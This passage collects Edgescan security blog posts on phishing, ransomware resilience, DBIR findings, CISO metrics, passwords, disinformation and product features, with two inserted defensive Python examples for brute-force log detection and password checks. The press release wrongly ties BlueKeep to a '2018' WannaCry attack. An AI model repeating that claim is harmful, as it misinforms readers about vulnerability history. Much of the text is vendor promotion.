Tips: the best way to protect your organisation from spear phishing is user education. Fostering a culture that puts security first and rewards employees for taking the time to validate the legitimacy of a message goes a long way towards minimising the success of phishers. Email filtering systems, often provided by default by email hosting providers, can be set to flag any email coming from an external, unrecognised sender, and can be set to warn users when they are about to download an attachment that should not be trusted.

#### BEC/CEO fraud

This type of phishing email is the hardest to spot. It usually entails attackers compromising the email account of a top-level executive, from which they contact other employees and ask them to transfer funds to a certain account. Instead of the client’s account, however, the money lands in the fraudsters’ pockets.
This attack is subtler to spot because the malicious message comes from a trusted email address that the recipient will recognise.

Tips: in this case, too, education remains an organisation’s first line of defence. These scams continue to be effective partly because senior executives often don’t attend cybersecurity awareness training alongside other employees. It’s therefore important to extend those courses to the whole company, and to run them on a regular basis rather than as a one-off.

Phishing attacks are here to stay because they offer fraudsters an easy and cost-effective way to launch an attack. The wealth of data exposed in the data breaches that make the news on a daily basis gives cybercriminals a huge pool of potential victims, who they can target conveniently with a Phishing-as-a-Service tool, available for a few hundred dollars on the dark web. The only way to reduce attacks preying on the human factor is to make them unprofitable: only when it is no longer worthwhile for scammers to send malicious emails will they stop targeting our inboxes.

#### Fighting Phishing with ASM

Phishing remains a major threat, but at Edgescan, we help you fight back. Our Attack Surface Management (ASM) identifies and reduces your exposure to phishing attacks by mapping and securing your digital footprint. Whether you’re in Dublin or New York, we help you stay resilient against evolving threats.

### Resilient to ransomware | Edgescan Whitepaper Special

“Just some thoughts on what to do to be more resilient to ransomware. There is no silver bullet but the below may reduce the risk and impact if you’re unfortunate enough to be faced with a breach.” Eoin Keary, CEO of Edgescan

To read the whitepaper, check out the button below.

### Thoughts on what to do to be more resilient to ransomware

Just some thoughts on what to do to be more resilient to ransomware.
There is no silver bullet but the below may reduce the risk and impact if you’re unfortunate enough to be faced with a breach. God bless, take care 😉

#### Awareness & Resilience (and budget)

Folks who write the cheques need to understand the value and importance of cyber security. It’s not a “Tax” or an “Insurance”; it’s a process through which we try to ensure we are somewhat resilient to breach. Breach is 9 times out of 10 more expensive than multiple years of cyber spend. Embrace cyber security! “Hackers don’t give a shit”, and if you are weak you will be hit. Cyber-resilience and awareness may not prevent breach, but it may limit the extent of the breach and enable us to act in a timely manner before the genie is out of the bottle. Investment in cyber security is paramount due to the potential losses from fraud and breach recovery. Compliance is not security; the focus needs to be on practical technical controls and a technical framework.

#### Asset Management and Attack Surface Management - Identify and prioritize - Risk

Maintain a list of what assets you have (data and systems). What’s the bill of materials for your network or system? We can’t secure what we can’t measure. Tracking of system resilience is of key importance. Deploy continuous monitoring and management of your external Internet-facing estate. This will help detect weaknesses and exposures as they arise. Real-time attack surface management is a simple but very effective way to understand what can be hacked at any point in time. Establish an asset register and an IT BOM (bill of materials). Identify critical assets (systems and data). Layer stronger controls around such systems. Perform threat modelling exercises around critical systems to identify cyber chokepoints and audit points to detect malice.

#### Threat Awareness - Intelligence

Deploy a solution to monitor lateral movement, brute forcing and typical indicators of compromise (IoC) traffic and artefacts.
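Brute-force monitoring of the kind just recommended can start from plain authentication logs. The Python below is an added example, not Edgescan’s code: it parses constructed SSH-style log lines, raises an alert when one source reaches a failure threshold inside a sliding window, and raises a higher-priority alert when a login from that source then succeeds, which is the post-breach activity worth catching early. The log lines, IP ranges, window and threshold are all illustrative.

```python
"""Brute-force and post-brute-force login detection over auth log lines.

Added example, not Edgescan's code. SAMPLE_LOG is constructed in the style of
a Linux sshd auth log using documentation IP ranges; the window and threshold
are illustrative defaults.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
2021-03-01T10:00:01 sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
2021-03-01T10:00:03 sshd[1202]: Failed password for root from 203.0.113.7 port 51236 ssh2
2021-03-01T10:00:05 sshd[1203]: Failed password for root from 203.0.113.7 port 51238 ssh2
2021-03-01T10:00:07 sshd[1204]: Failed password for invalid user test from 203.0.113.7 port 51240 ssh2
2021-03-01T10:00:09 sshd[1205]: Failed password for deploy from 203.0.113.7 port 51242 ssh2
2021-03-01T10:00:11 sshd[1206]: Failed password for deploy from 203.0.113.7 port 51244 ssh2
2021-03-01T10:00:20 sshd[1210]: Accepted password for deploy from 203.0.113.7 port 51250 ssh2
2021-03-01T10:05:00 sshd[1300]: Accepted publickey for alice from 192.0.2.10 port 40000 ssh2
2021-03-01T10:06:00 sshd[1301]: Failed password for bob from 192.0.2.11 port 40001 ssh2
2021-03-01T10:06:02 kernel: usb 1-1: new high-speed USB device number 4 using xhci_hcd
"""

# Only authentication outcomes are of interest; every other line is skipped.
AUTH_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_auth_events(lines):
    """Return a list of (timestamp, succeeded, user, source_ip) per matching line."""
    events = []
    for line in lines:
        m = AUTH_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]),
                           m["result"] == "Accepted", m["user"], m["src"]))
    return events


def detect(lines, window_seconds=60, threshold=5):
    """Return alerts as (kind, source_ip, user, iso_timestamp) tuples.

    'brute_force' fires when a source's failure count inside the sliding
    window reaches `threshold` (not on every further failure);
    'success_after_brute_force' fires when a login from a source that is
    still at or over the threshold succeeds.
    """
    recent_failures = defaultdict(deque)  # source_ip -> failure timestamps in window
    alerts = []
    for ts, succeeded, user, src in sorted(parse_auth_events(lines)):
        window = recent_failures[src]
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()  # drop failures that aged out of the window
        if succeeded:
            if len(window) >= threshold:
                alerts.append(("success_after_brute_force", src, user, ts.isoformat()))
        else:
            window.append(ts)
            if len(window) == threshold:
                alerts.append(("brute_force", src, user, ts.isoformat()))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert)
```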
Threat awareness is important to help detect both post-breach activities and internal threats and weaknesses. Early detection is important in terms of limiting breach. Processing of logs, maintaining of logs, tracking what’s important: ensure we are auditing transactions, traffic and events on core systems. Such audit logs need to be consolidated and monitored for anomalies. Log scraping looking for errors and non-standard events would be a great start. Log non-idempotent transactions, authentication between users and systems, and authentication between systems themselves.

#### Vulnerability Management

Detect weaknesses as they occur: patching, web application and API weaknesses. Exposed remote access services, administration consoles and weak cryptography all need to be tracked continuously. Key to this solution being effective is accuracy. Solutions with guaranteed accuracy are preferred, resulting in a reduction of “white noise” so we can focus on real issues. The majority of ransomware leverages CVEs to exploit target systems. Full stack vulnerability management makes systems more resilient to such attacks. Focus on a risk-based approach to patching and addressing weakness. “All vulnerabilities are not created equal”: focus on what matters, critical systems and data first, moving down the list.

#### Penetration testing

Hackers manually probe systems and they are expert operators. Using software alone to assess security is never going to work. To level the playing field we need to fight fire with fire. Today’s cybercrime consists of working professionals and industrialized capability. We need to be the same. Penetration testing consists of manual “deep dive” assessments using human intelligence simulating a determined attacker. It is generally more effective in uncovering weakness, but it is expensive and not as scalable.

#### Metrics & Measure improvement

Record improvement. What’s difficult, what’s taking a long time? Which cyber security activities are taking a long time and are challenging?
Which systems cause the most cyber security effort? Which systems are historically more problematic and require the most attention? Which layer (network or application) has the highest risk density, and where do we focus our efforts? Examine vulnerability types, be they patching, developer or architecture related. Figure out the root cause so that training and awareness can focus on preventing the bugs and errors which manifest as weaknesses.

#### Patch

Every year thousands of CVEs (Common Vulnerabilities and Exposures) are discovered. Systems previously thought secure today suffer from a critical risk tomorrow. Constant tracking is required: constant vulnerability management to detect, and risk-based patching to fix. Establish a patching programme. Use automation if possible.

#### Email and Internet Browsing Security

Lock down email systems and deploy an email security service to help minimize exposure. Lock down users’ browsing access to a whitelist of legitimate sites.

#### Data Encryption and Secure Storage

Data which is critical to the business, sensitive in nature or contains PII needs to be encrypted, with a suitable key management solution in place. Passwords should be stored in an unrecoverable way (salted and hashed).

#### Backup Frequently

Backing up of data and systems is undervalued and paramount to restoring after a breach. The frequency of backup has a bearing on loss: more frequent backups mean a smaller window of exposure. Try to deploy a real-time backup solution if possible. Backups should be stored in a secure part of the network which requires authentication etc., to limit the chance of malware affecting backup repositories.

#### Authentication and Limitation & Zero Trust

Enable multifactor authentication (MFA) for critical systems, be it certificate-based combined with a password or other means. Ensure system-to-system authentication is also enabled; adopt a “Zero trust” model.
IP-limit traffic between systems from an architectural standpoint in order to make the network more hierarchical and less “flat”. This can limit the spread of infection.

The extent of this problem is only growing, based on the statistics we produce every year alongside other organizations. More statistics can be found in the Verizon DBIR and the Edgescan Vulnerability Stats Report 2021.

Eoin Keary, CEO/Founder Edgescan, http://ekeary.blogspot.com/

### Eoin Keary's Analysis of 2021 DBIR Report

The 2021 Verizon Data Breach Investigations Report (DBIR) was recently released and it is a great snapshot of the information security ecosystem as a whole. A portion of the report covers Web Application Hacking and System Intrusion, both of which Edgescan provides protection against through continuous detection and vulnerability intelligence. Edgescan is a noted contributor (amongst many others) to the DBIR. We’ve provided curated vulnerability data to the report for the last 3 years.

“We’re pretty happy to see so many correlations between the statistical models and have taken the liberty to put our spin on this industry-leading document, the Verizon DBIR report….”

### Edgescan’s data for the greater good: the Verizon Business 2021 Data Breach Investigations Report is live

For the third year running, Edgescan is proud to announce that it has contributed data to the Verizon Business 2021 Data Breach Investigations Report (2021 DBIR). Working in partnership with the DBIR team, Edgescan provided data on thousands of validated vulnerabilities across the full stack, based on delivering tens of thousands of cyber security assessments globally in 2020. The data Edgescan provided reflected web, network, cloud and API vulnerability data across many verticals and many regions of the world, which we believe to be a true reflection of the state of cyber security and vulnerability management.
“Edgescan’s vulnerability data continues to help us build a robust corpus of patching data that we used while writing the Asset section of the DBIR. We are pleased to work with Edgescan again this year and the company continues to be an excellent contributor to work with,” said Gabriel Bassett, Lead Data Scientist of the Verizon Business DBIR.

With 29,207 quality incidents analysed, of which 5,258 were confirmed breaches, the 2021 DBIR provides a comprehensive snapshot of the state of cybersecurity globally, and we are, of course, delighted to have taken part in this industry-wide effort to capture the challenges facing organisations.

#### The Findings

Perhaps unsurprisingly, the report found that the pandemic offered cybercriminals an opportunity to increase their efforts to monetise the world’s state of crisis. Phishing and ransomware both thrived during the pandemic, with phishing increasing by 11 percent and ransomware by 6 percent. BEC scams, in particular, have shown a steep increase, with attempts doubling compared to the previous year.

In line with Edgescan’s own Vulnerability Stats Report, the 2021 DBIR found that web applications continue to make an appealing target for cybercriminals as organisations move their operations to the cloud. In fact, web application breaches represented 39 percent of all the breaches analysed.

While Verizon Business found that security continues to be a challenge for organisations across all industries, each vertical had its own set of risks to face. According to the report, the Financial and Healthcare sectors were riddled with Misdelivery breaches (55 and 36 percent, respectively). Public administration, on the other hand, seems to be the prime target for social engineering attacks aimed at stealing sensitive credentials. Interestingly, the human factor continues to be a necessary component of a successful breach, with 85% of security incidents analysed indicating the involvement of a human element.
The Verizon Business DBIR is a chance for the cybersecurity industry to reflect on what it is doing right and where there is room for improvement. And the message is clear: attackers are more than ready to jump on any opportunity to make a quick profit, whether that means exploiting a global crisis or attacking critical infrastructure, as recent events have demonstrated. In light of this, it is ever more important for the cybersecurity industry as a whole to come together and join forces. We are delighted to have been able to provide our accurate, validated data to the folks at Verizon Business, whose hard work is incredibly important for defenders across the globe.

Eoin Keary, CEO/Founder Edgescan, http://ekeary.blogspot.com/

### Edgescan's new user dashboard won an iF Design award!

We are thrilled here at Edgescan to have won yet another fantastic award, for our new user dashboard (https://edgescanstage.wpengine.com/introducing-edgescans-new-dashboard/). We are beaming with joy that our innovative UI design has been recognised again, having won the Good Design (https://edgescanstage.wpengine.com/edgescans-new-user-dashboard-won-an-if-design-award/) award back at the beginning of 2021. Without our Design Partners and all on Team Edgescan, these awards would not have happened. We thank you for all your hard work and creativity!

### Cybersecurity – Demonstrating Value to your Organization (AKA How to Keep your Job as a CISO)

In some walks of life, cybersecurity is considered a tax or an expense rather than an enabler. Looking at cybersecurity as a tax is similar to concluding that locks on doors or a credit card verification device are also a tax. A tax is something people feel they pay and get little in return; this is not always the case, but you get the idea. Cybersecurity is a keystone of doing business on the Internet.
It is as important as the quality of your web application and how the user interacts with your product or service, and it encourages clients to use your service if they can be assured there is a decent level of security surrounding their data and transactions.

As a security practitioner or a technologist, we may encounter cynics questioning the value of cybersecurity, or you may have to justify why investment needs to be made in cybersecurity in order to keep the organization on a strong footing. The following are ways to demonstrate value.

#### Why are we doing cyber? Measure, measure, measure...

Consider metrics, but in terms of explaining to the business let’s focus on some easily understandable ones such as:

- Discovered Vulnerabilities (internal and public facing)
  - How many vulnerabilities are we discovering across the business as a whole?
  - Which business units / locations appear to be more vulnerable?
  - What is the average risk (risk density) of discovered vulnerabilities?
  - Which critical services are subject to vulnerabilities?
- Speed of Remediation & Patching
  - How quickly are we fixing Critical and High Risk vulnerabilities?
  - How quickly are we patching, and how often do we audit for non-patched systems?
- Location of Vulnerabilities
  - What is the percentage of public-facing vulnerabilities vs internal/non-public vulnerabilities?
  - What is the risk profile of vulnerabilities based on the location or exposure of the system?
- Source of Vulnerabilities
  - How many vulnerabilities are patch related?
  - How many vulnerabilities are application/developer related?
  - How many vulnerabilities are related to outsourced or B2B systems?
- Potential Compliance Violations
  - How many vulnerabilities violate compliance or quality standards (PCI/CIS/ISO etc.)?
  - What is the business impact of non-compliance based on the discovered vulnerabilities?
- Detected Intrusion Attempts
  - How many intrusion attempts are being observed for a given time period?
  - What is the source of the intrusion attempts (internal/external)?
  - What type of intrusion attempts are being observed?
  - Is the intrusion against a service with known vulnerabilities?
- Peer relativity
  - How is the organization faring compared to peer or global averages in terms of mean time to remediate (MTTR), risk density and patching speed?
- Vulnerability Discovery Cadence, System Deployment & Continuous Monitoring
  - Tracking how often vulnerability assessment is occurring and which systems are in scope.
  - How many systems are exposed to the public internet, and what services are on the endpoints?
  - How many new systems were deployed in the last period, and what do they do?

These metrics can sometimes be difficult to track and nurture, which is a challenge. Leveraging a risk dashboard covering both network/host and application layer risk metrics is something worth considering. There is a trend towards integration of related systems to achieve this, something Edgescan has been dedicated to achieving for the past 5 years. Edgescan provides unparalleled vulnerability assessment and penetration testing monitoring, coupled with real-time continuous asset & API discovery, for some of the world’s largest organizations.

### Edgescan Partners with BSI to Deliver Safe and Secure Client Solutions

Edgescan, providers of the award-winning Fullstack Vulnerability Management™ range of services, today announces its partnership with BSI, the business improvement company. The partnership will enable BSI clients to access Edgescan’s Continuous Vulnerability Management, API Security Assessments, Penetration Testing as a Service (PTaaS) and Application Testing services, which can be tailored to meet their customers’ priorities.
Stephen O’Boyle, Global Practice Director - Cyber, Risk and Advisory at BSI, said: “We are delighted to be partnering with Edgescan, who have been named highest scoring application security solution by Gartner Peer Insights, the peer-driven ratings and reviews platform, and also won the Computing Security ‘Winners’ Award in 2020.”

“This partnership means we can offer clients a more in-depth and resilient suite of security testing services that will meet the customer’s diverse security and compliance requirements in this fast-changing environment. Implementing these solutions ensures that an organization’s critical assets and information are properly protected from avoidable threats and that organizations can, with confidence, meet their regulatory requirements by delivering safe and secure services to the benefit of their customers”, O’Boyle added.

Eoin Keary, Founder & CEO, Edgescan, stated: “It’s great to be partnering with the team at BSI, who are committed to helping their clients in delivering safe and secure services that are fit for purpose and offer clear benefit to the customer. When it comes to Edgescan, the client’s critical assets and information need to be the primary focus regardless of the company’s size. Edgescan meets the exacting requirements of CREST™ and holds National Cyber Security Centre Cyber Essentials Scheme and ISO 27001:2013 certifications, and we look forward to BSI leveraging the services we can provide and working with them to facilitate their clients’ needs.”

BSI’s client solutions are supplied through information security-minded practices that enable clients to protect their sensitive data and reduce the risk of threat to their people, reputation, and finances. The BSI Consulting Services team provides a range of solutions to help organizations address challenges in cybersecurity, information management and privacy, security awareness and compliance.
Edgescan’s award-winning platform will be added to BSI’s offering, enriching their portfolio of solutions aimed at helping businesses grow with security in mind. Edgescan’s continuous vulnerability intelligence accurately identifies vulnerabilities and exposures across the full stack. All threats are verified by cybersecurity experts, providing exploitable risk and remediation guidance when the client needs it.

#### Securing APIs with Confidence

Collaborating with BSI allows us to enhance the security of complex systems. Our API Security Testing service ensures your APIs are secure, reducing the risk of breaches in your integrations. With offices in Dublin and New York, we’re your trusted partner for robust API protection.

### 2020 Vulnerability Statistic Report Press Release

Over 65% of the CVEs Edgescan found in 2020 are more than 3 years old, with 32% dating back to 2015 or earlier. Edgescan’s 2021 Vulnerability Stats Report offers a snapshot of the overall state of cyber security globally.

DUBLIN, 15th FEB 2021 - Edgescan, providers of the award-winning Fullstack Vulnerability Management™ range of services, today releases the 2021 Vulnerability Stats Report that, for the sixth year running, offers unique insight into the global security landscape from a trends and statistics perspective, as well as a snapshot of the overall state of cyber security globally. This year’s report takes a deeper look at vulnerability metrics from a known vulnerability (CVE), malware, ransomware and visibility standpoint (exposed services), covering both internal and public Internet-facing systems.

Edgescan’s 2021 Vulnerability Stats Report aims to demonstrate the state of full stack security based on thousands of security assessments performed globally, as delivered by Edgescan during the past year.

Some of the key findings include:

- Remote Desktop (RDP) and Secure Shell (SSH) exposures increased by 40%, likely due to the increase in remote working due to Covid-19.
This resulted in a massive increase in discovery of vulnerabilities such as the infamous Bluekeep (CVE-2019-0708), the critical bug behind the Wannacry attack of 2018  Of a sample of 1,000,000 endpoints profiled in 2020, 21,070 of the endpoints had an exposed database. This points to a serious lack of asset inventory and visibility  Over 65% of the CVEs Edgescan found in 2020 are more than 3 years old, with 32% dating back to 2015 or earlier  The oldest vulnerability discovered in 2020 in the wild: CVE-1999-0517 is 21 years old, but some systems are still exposed  It takes organisations an average of 84 days to remediate high risk vulnerabilities  SQL injection endures: 51.7% of discovered critical risk issues related to SQLI on the web application layer. SQL could allow attackers to exploit a data breach, tamper with existing data, and even become administrators of the database server in specific cases  The most common malware-related vulnerabilities are between 1 and 3 years old  Malware is exploiting common old vulnerabilities, which could easily be patched  By far the most insecure framework on the internet is PHP, accounting for 22.7% of all critical risks discovered in 2020  13.4% of all critical risks discovered in 2020 related to unpatched, unsupported or out-of-date systems  33% of discovered vulnerabilities on public Internet facing web applications were High or Critical Risk, while 50% of discovered vulnerabilities on Internal web applications were High or Critical Risk.  “I am still as passionate as ever in compiling this report and delving into the underlying data. We still see high rates of known (i.e. patchable) vulnerabilities which have working exploits in the wild, used by known nation states and cyber criminal groups. So yes, patching and maintenance are still challenges, demonstrating that it is not trivial to patch production systems”, said Eoin Keary, CEO and founder of Edgescan.     
“This report provides a glimpse of a global snapshot across dozens of industry verticals and how to prioritize what is important, as not all vulnerabilities are equal. This year we call out which threat actors are leveraging discovered vulnerabilities, which should be food for thought,” he added.

The value of Edgescan’s data has become more evident as their unique dataset is now a regular part of other annual security analysis reports, such as the OWASP Top 10 and the Verizon DBIR.

To get a copy of the 2021 Vulnerability Statistics Report, click here.

### Good Password Management

While being online can be fantastic, a key to staying secure is the creation of long and strong passwords.

Tips on creating a traditional password:

- Have a minimum of 12 characters.
- Include numbers, symbols, uppercase and lowercase letters.
- Stay clear of dictionary passwords, such as 'Edge Scan'.
- Don't substitute obvious letters with numbers, such as '3dge Sc4n'.

When creating a password, try something such as '$c@nEdg3123#': it is complex and follows all of the tips above.

An excellent Edgescan tip for creating a memorable password is to use a passphrase. Try something like 'corr3ct3dgesc@n_i$#th3BEST!'; here we take several random, unrelated words and combine them into a passphrase. Remember, even if the password is complex, it is recommended not to reuse it across multiple accounts.

Following on from the traditional tips, password managers are a great way to ensure your passwords are randomised, of suitable length and suitably complex.

Password Managers

There are many password managers widely available; one to recommend is LastPass (https://lastpass.com/create-account.php). It offers a free version and is compatible with Windows, MacOS, Linux, Android, iPhone and iPad, along with browser extensions for Chrome, Firefox, Safari, Internet Explorer, Edge and Opera.
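The password tips above (minimum length, character classes, no dictionary words and no letter-for-number substitutions such as '3dge Sc4n') and the passphrase suggestion, as an added Python example that is not part of the original post and not Edgescan's code. The dictionary and word list are tiny constructed stand-ins; a real checker would load a full wordlist (an assumption, not something the post specifies). The dictionary check first undoes common substitutions, so a leetspeak dictionary word is still caught, while a passphrase of several unrelated words is allowed:

```python
"""Password policy check and passphrase generation (added example).

Not Edgescan's code and not part of the original post. The dictionary and
word list below are constructed for the demo; a real deployment would load a
full wordlist (assumption).
"""
import re
import secrets
from typing import List, Optional

MIN_LENGTH = 12
# A password whose letters collapse to this many dictionary words or fewer is
# treated as a dictionary password ("Edge Scan"); a passphrase built from
# several independent words is not.
MAX_DICTIONARY_WORDS = 2

# Constructed demo dictionary (assumption; not from the original post).
DICTIONARY = {
    "edge", "scan", "edgescan", "password", "welcome", "admin", "correct",
    "is", "the", "best", "horse", "battery", "staple", "violet", "kettle",
    "glacier", "pencil", "orbit", "walrus", "meadow", "copper", "lantern",
}
# Constructed demo word list for passphrase generation (assumption).
WORDLIST = sorted(w for w in DICTIONARY if len(w) >= 5)

# Substitutions the post warns against ("3dge Sc4n"): undo them before the
# dictionary check so leetspeak cannot hide a dictionary word.
LEET_MAP = str.maketrans({
    "0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
    "@": "a", "$": "s", "!": "i",
})


def normalise(password: str) -> str:
    """Lower-case, undo leet substitutions and keep letters only."""
    return re.sub(r"[^a-z]", "", password.lower().translate(LEET_MAP))


def min_dictionary_words(core: str) -> Optional[int]:
    """Fewest dictionary words that exactly cover `core`, or None if impossible."""
    best: List[Optional[int]] = [None] * (len(core) + 1)
    best[0] = 0
    for end in range(1, len(core) + 1):
        for start in range(end):
            if best[start] is not None and core[start:end] in DICTIONARY:
                candidate = best[start] + 1
                if best[end] is None or candidate < best[end]:
                    best[end] = candidate
    return best[len(core)]


def check_password(password: str) -> List[str]:
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not re.search(r"[0-9]", password):
        problems.append("no number")
    if not re.search(r"[^A-Za-z0-9\s]", password):
        problems.append("no symbol")
    if not re.search(r"[A-Z]", password):
        problems.append("no uppercase letter")
    if not re.search(r"[a-z]", password):
        problems.append("no lowercase letter")
    core = normalise(password)
    words = min_dictionary_words(core) if core else None
    if words is not None and words <= MAX_DICTIONARY_WORDS:
        problems.append("dictionary password (even after letter/number substitutions)")
    return problems


def generate_passphrase(word_count: int = 4) -> str:
    """Random passphrase from independent words, e.g. 'Walrus-Copper-Orbit-Kettle-17!'."""
    words = [secrets.choice(WORDLIST).capitalize() for _ in range(word_count)]
    suffix = f"{secrets.randbelow(100):02d}{secrets.choice('!#$%&*')}"
    return "-".join(words) + "-" + suffix


if __name__ == "__main__":
    for candidate in ["Edge Scan", "3dge Sc4n", "$c@nEdg3123#", "corr3ct3dgesc@n_i$#th3BEST!"]:
        print(f"{candidate!r}: {check_password(candidate) or 'OK'}")
    print("suggested passphrase:", generate_passphrase())
```

Run as a script it reports why 'Edge Scan' and '3dge Sc4n' fail and that the two passwords recommended in the post pass; `secrets` rather than `random` is used for the passphrase so the words are drawn from the operating system's CSPRNG.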
LastPass is easy to use, with many features, from access on all devices to password generators and multi-factor authentication.

Multi Factor Authentication

Although having a complex password or using a password manager is great, don't let that security be weakened by failing to enable 2 Factor Authentication across all your accounts. Most platforms nowadays should offer 2FA in multiple forms; this can generally be found within the security settings of your account.

In order to set up 2FA, you can receive your codes from any of the following:

- SMS (text message)
- Email
- Authenticator app, such as Google's Authenticator app
- Authentication notifications
- Hardware authentication devices, such as a YubiKey

Stay safe, create those complex passwords, use a password manager and remember to always enable 2FA!

Subscribe to the Edgescan blog to receive updates.

Emma Heffernan, Security Analyst at Edgescan

### Look out for Miss Information: How to explain disinformation to children

Have you ever questioned whether what you read online is real or fake? The internet is evolving: information can come from anywhere, be that reputable news sites, social media or articles without citation. It can be obvious to some which of these are trustworthy; however, especially for the youth, this isn’t so easy. We already observe the mass circulation of false information. Now more than ever, it is of the utmost importance to educate the youth on how to distinguish truth from lies and fact from fiction.

The sharing of false information online has two main sources:

- Disinformation: the act of deliberately sharing misleading information which you know to be false but portray as true.
- Misinformation: the act of sharing false information unbeknownst to you.

There are many reasons why people, especially those of a young age, engage with and believe everything they see.
It is a form of engagement, whether it is seen as bullying, popularity-seeking or scaremongering, and it leads to more serious consequences. Children as young as 9 years old have connected devices. This opens up the world of social media, online gaming, chat communications and much more. In recent years there have been numerous headline-worthy examples of disinformation, including flat earth theories, presidential elections and a hoax story that a well-known celebrity had passed away after suffering a heart attack. We must remember how naive children can be, with most believing everything they are told.

Online challenges have been a fad in recent years, from beneficial challenges such as the “Ice Bucket Challenge” to unfortunate ones such as the “Tide Pod Challenge”. Recently, a Spanish article reported that over 800 kids were hospitalised after drinking hand sanitiser, allegedly as part of a popular social media challenge.

The amount of false information on the internet has become so immense that there are now entire websites based on the idea of spreading it; some of these “news” sites are known as satirical. Their goal is not to spread misinformation but instead to make the story seem extremely unlikely to occur. Their recent growth in popularity can be attributed both to the spreading of jokes and, more disappointingly, to people misunderstanding the humour and believing it to be true. In the past, satirical sites have posted articles which ended up becoming true. This is similar to “The Simpsons” effect or “The Infinite Monkey Theorem”. These sites can be a grey area: yes, they provide humour, but they also mislead.

With this flood of information, be it true, false or satirical, it is more important than ever for the youth to be able to detect fake news. One way of doing so is by asking these 6 simple questions:

1. Where did you find this information?
2. Do you trust the URL?
3. Is it a well-known source?
4. What is the source of the information?
5. Is there an author attached to the piece?
6. What do you gain from sharing this information?

As the old Irish proverb goes, “a lie travels farther than the truth”. Always be wary of what you share online, and make sure you have reliable sources to back you up!

Subscribe to the Edgescan blog to receive updates.

Emma Heffernan, Security Analyst at Edgescan

### Edgescan Features You Really Need To Know About

As you may have noticed, the Edgescan platform has recently rolled out a new UI, and here are the features you really need to know about. We are proud of the award-winning design and the improved functionality; feedback from users has been fantastic.

Validate Yourself

All application layer vulnerabilities can be recreated by copying a cURL or raw request. This helps you understand the entire request and the steps taken to reproduce the vulnerability.

Retest

You can retest vulnerabilities on demand. So you've fixed a vulnerability; now hit "Retest" and bingo, Edgescan will validate whether the issue is mitigated. You can also retest all vulnerabilities, or select whichever ones you want to retest, via the Assets page. Retesting via the API is done through the retest endpoint.

On-Demand Assessment

If you need an on-demand assessment, say because you just deployed a new feature or need an ad hoc assessment, you can start one via "Start" on the Assets page or via the API.

Metrics

The new Edgescan UI provides a huge array of metrics, from MTTR and Exposure Factor to Risk over Time and Asset Risk.

API Integration

Generate WAF Rule: You can auto-generate a Web Application Firewall rule for specific WAFs. This may help you virtually patch the vulnerability if you can't make the code fix. This can also be done via the API.

Setting up Events: Events keep you informed based on what matters to you, be it a newly discovered vulnerability, a closed vulnerability, a newly discovered host, an API discovery, open ports on a host, etc.
Events can integrate with the likes of Jira, Teams, Slack, email, SMS, etc.

Like what you see? Contact Edgescan Sales to arrange a POC or request a demo.

Subscribe to the Edgescan blog to receive updates.

### Edgescan UI wins GOOD DESIGN Award

We are delighted to announce that the new Edgescan UI redesign has won a GOOD DESIGN Award in the Mobile Application 2020 design category. The new Edgescan UI was designed in collaboration with Design Partners (Marija Cosic, Kevin Dunne and Cormac Ó Conaire), based in Bray, alongside our own team consisting of David Kennefick, Matt Craig, Joe Douglas and Owen Money. Below are some of the innovative design elements included in the GOOD DESIGN Awards entry that impressed the judges.

Challenge

The main challenge was to take the old Edgescan platform, which displayed a high amount of information from scanning and identifying vulnerabilities, and at the same time display exactly what customers need to see, namely the various risks the platform has identified, in an environment free of clutter and non-essential information. We wanted to save time for our customers and improve the efficiency with which they use our platform.

Design

One element of the story told by the design team was 'noise reduction': the USP was to be part of every design decision, simplifying all complexity, reducing the noise of the UX and only exposing users to relevant information. All of these decisions also deliver even more time savings for clients.

“Support costs and overhead costs are reduced by introducing more intuitive design. Combined with more ways to authenticate, it’s much easier for organizations to train new staff on the Edgescan platform.” - David Kennefick, Product Architect, Edgescan

Our final colour palette was made fully colour-blind accessible, while remaining clear and consistent.
The traffic light system was introduced to all critical areas so the information was understandable even on first use of the product.

Conclusion and Result

“Great design reflects both the customer's needs and the brand promise. Our customers are now able to generate reports faster than ever before and view vital information quickly at just a glance. This represents a huge time saving for our clients.” - David Kennefick, Product Architect, Edgescan.

In the end, we followed through with our design ethos of reducing noise on our platform and standing out from our competitors.

The GOOD DESIGN Awards

The Chicago Athenaeum Museum of Architecture and Design and Metropolitan Arts Press Ltd. present the Museum's annual GOOD DESIGN Awards Program for the most innovative and cutting-edge industrial product and graphic designs produced around the world.

### Introducing Edgescan's New Dashboard

We are delighted to announce that the new Edgescan user front-end interface will be released next week, and we're really excited to get it in front of our customers. So what can you expect when you log in?

A cleaner design

We've spent a lot of time designing a cleaner interface, with better use of space and colour to reduce noise, and this effort is visible on every page. We've also written an extensive component library to allow us to rapidly build new functionality going forward. We're grateful to Design Partners, who worked closely with us to create our design language.

Dashboard

Our revamped dashboard combines the best parts of our old dashboard and metric pages. We've designed it to show you your current security posture, and your progress towards improving it, at a glance.

Easier Reporting

We know how important reporting is to our customers, and now it's never more than a click away.

Improved filtering for assets

We know that many customers need more tools to manage their assets, so we've made our powerful querying functionality available on the assets page.
Want to see which of your authenticated assets are currently being scanned? Now you can.

Saved Filters

You can save your most commonly used filters for the asset, vulnerability and host pages. Your saved filters are only a click away on the dashboard, placing the information you need at your fingertips.

This release is the culmination of a year of hard work by our core team. We started this project with the aim of delighting our customers and building a firm foundation for the future, and we're very proud of the result. We're sure our users will love it as much as we do!

### Top tips on how to secure a WordPress website

WordPress is one of the most popular blogging and website platforms currently on the web. It is currently estimated that there are approximately 1.3 billion active websites, and it is believed that 445 million of them are built with WordPress. Due to the popularity of the platform, though, and the nature of open source, there is a constant battle to balance security between the core platform and external plugins and themes. Below are some tips on how to simply improve the security of a WordPress website.

1: Don't use a default username

